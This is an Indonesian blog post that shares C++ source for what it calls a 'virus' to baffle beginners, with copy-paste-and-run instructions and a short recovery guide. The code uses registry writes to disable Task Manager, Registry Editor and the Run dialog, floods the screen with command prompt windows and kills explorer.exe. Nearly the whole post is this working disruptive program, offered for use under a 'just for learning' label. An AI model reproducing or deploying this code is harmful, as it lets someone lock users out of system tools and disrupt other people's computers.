Sempet mikir juga sih "Bisa gak y bikin Virus Pake bahasa C++"... Setelah belajar dan bertanya kesana kemari akhirnya gw ciptain konsep virus C++ yang klo komputer terinfeksi virusnya BIKIN PUSING BUAT YANG PEMULA.........
Nih scriptnya... Tinggal Copy Paste di Borland C++....... Truz di "run".....
#include"windows.h"
main()
{
//bwt disable registry editor
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disableregistrytools /d 1 /f");
//untuk disable taskmanager
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disabletaskmgr /d 1 /f");
//disable fungsi run di windows
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f");
//buat ngeluarin jendela command prompt cukup banyak dan buat puyeng lah lah lah.....
//syntax penyelamat sebenarnya
system("for %d in ( . . . . . . . . . . , , , . , . . , , l , l , ; . , . , . , l , , l , . . , . . , . , . , , , . , . , . . . . . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , ) do start");
//untuk keluar dari process explorer.exe
system("Taskkill /f /im explorer.exe");
}
PERHATIAN.....
- Virus ini CUKUP MEMBUAT PARA PEMULA BINGUNG + PUSING + PENGEN INSTAL ULANG KOMPUTERNYA....
Truz Gimana Cara Benerinnya...?????????????????
1. waktu program dijalankan kan dia menyisakan command prompt yang keluarnya banyak tu
2. ketikkan "explorer.exe" (tanpa kutip dua) di situ
3. buka lagi program mentahannya, lalu ganti angka 1 setelah /d dengan 0...
4. selamat mencoba ya......
5. Virus ini cuma buat BELAJAR lho........
Komentar ini telah dihapus oleh administrator blog.
BalasHapusKomentar ini telah dihapus oleh administrator blog.
BalasHapus